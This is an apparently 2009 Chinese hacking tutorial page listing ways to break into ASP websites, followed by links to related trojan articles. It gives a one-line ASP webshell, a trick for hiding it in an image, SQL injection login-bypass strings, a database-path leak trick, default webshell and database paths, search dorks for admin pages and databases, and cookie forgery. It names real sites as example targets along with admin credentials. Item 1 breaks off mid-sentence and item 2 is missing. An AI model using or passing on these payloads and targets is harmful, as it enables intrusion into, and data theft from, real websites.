脚本之家 服务器常用软件
快捷导航
您的位置:主页 > 网络安全 > 安全教程 >

菜鸟是如何变成ASP木马高手的!

  发布时间:2009-06-09 11:28:18   作者:佚名   我要评论
1.名称:如何制作图片ASP木马   建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->   找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要替

3.旁注,也就是跨站.

  我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了

  4.暴库:把二级目录中间的/换成%5c

  EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1

  如果你能看到:\'E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。

  这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

  5.\'or\'=\'or\'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

  \'or\'\'=\' " or "a"="a \') or (\'a\'=\'a ") or ("a"="a or 1=1-- \' or \'a\'=\'a

  6.社会工程学。这个我们都知道吧。就是猜解。

  EY:http://www.neu.edu.cn/waishi/admin

  admin waishi

  7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.

  EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马

  8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.

  EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

  这个站用的是:杰出校友录,源码我下过了,

  默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

  9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

  /Databackup/dvbbs7.MDB

  /bbs/Databackup/dvbbs7.MDB

  /bbs/Data/dvbbs7.MDB

  /data/dvbbs7.mdb

  /bbs/diy.asp

  /diy.asp

  /bbs/cmd.asp

  /bbs/cmd.exe

  /bbs/s-u.exe

  /bbs/servu.exe

  工具:网站猎手 挖掘鸡

  EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

  10.查看目录法:人一些网站可以断开目录,可以方问目录。

  EY:http://www.ujs168.com/shop/admin/

  http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

  这样我们可以找到数据库,下载不用我教吧

  11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]

  12.搜索引擎利用:

  (1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

  (2).找网站的管理后台地址:

  site:xxxx.comintext:管理

  site:xxxx.comintitle:管理 <关键字很多,自已找>

  site:xxxx.cominurl:login

  (3).查找access的数据库,mssql、mysql的连接文件

  allinurl:bbsdata

  filetype:mdbinurl:database

       filetype:incconn

  inurl:datafiletype:mdb

  我主不做了。。自已做做吧。。

  13.COOKIE欺骗:

  把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了

  14.利用常见的漏洞:如动网BBS

  EY:http://js1011.com/bbs/index.asp

  可以先用:dvbbs权限提升工具,使自已成为前台管理员。

  THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

  这个我就不做了,网上教程多的是,自已下个看看。

  工具:dvbbs权限提升工具 动网固顶贴工具

  15.还有一些老漏洞。如IIS3,4的查看源码,5的delete

  CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

上一页 1 2 3 4下一页阅读全文

相关文章

  • 教你成为ASP木马高手

    1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木
    2008-10-08

  • 4种最流行的木马捆绑器技巧

    一、传统的捆绑器   这种原理很简单,也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候,B.exe也跟着执行了。这种捆绑器的代码是满
    2008-10-08

  • 木马免杀绝招以及常用的修改方法

    常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。  ...常用的木马免杀方法 绝招一:快速搞定瑞星文件查杀 操作步骤:
    2009-03-07

  • Asp脚本木马技术

    现在很多的站点,为便于建站和后台管理,都使用ASP动态程序。但这也为整个站点的安全带来很大隐患,现在典型的网站攻击就是通过植入ASP木马,从而得到系统的控制权。早期的
    2008-10-08

  • 常见的木马所有隐藏启动方式总结

    木马的最大的特点之一就是它一定是要和系统一起启动而启动,否则它就完全失去了意义!下面为大家介绍一下它的几种隐藏启动的方法:   方法一:注册表启动项:这个大
    2008-10-08

  • 黑客必懂的木马连接原理

    目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马   正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才
    2008-10-08

  • 菜鸟必懂的木马连接原理

    目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马   正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才
    2008-10-08

  • 几招帮你识别和防御Web网页木马

    常见的网页木马攻击手段有哪些?用户应该如何识别及防御来自网页木马的攻击?笔者将在本文为用户细细道来:
    2015-09-21

  • 什么是恶意网站?详解2016最新的钓鱼、黑客入侵、木马病毒教程

    大家都知道恶意网站在我们平时上网的时候并不少见,最常见的就是扎起我们登录qq和百度网页中见到的一些,现在小编就为大家讲解2016年最新黑客入侵教程
    2016-08-24

  • 如何手工查找后门木马?手工查木马教程

    现在大多数电脑技术人开始学习防范技术了,因为现在防范技术比攻击技术要重要,下面就一起来看看如何手工查找后门木马吧
    2016-08-24

最新评论

关注微信公众号

扫一扫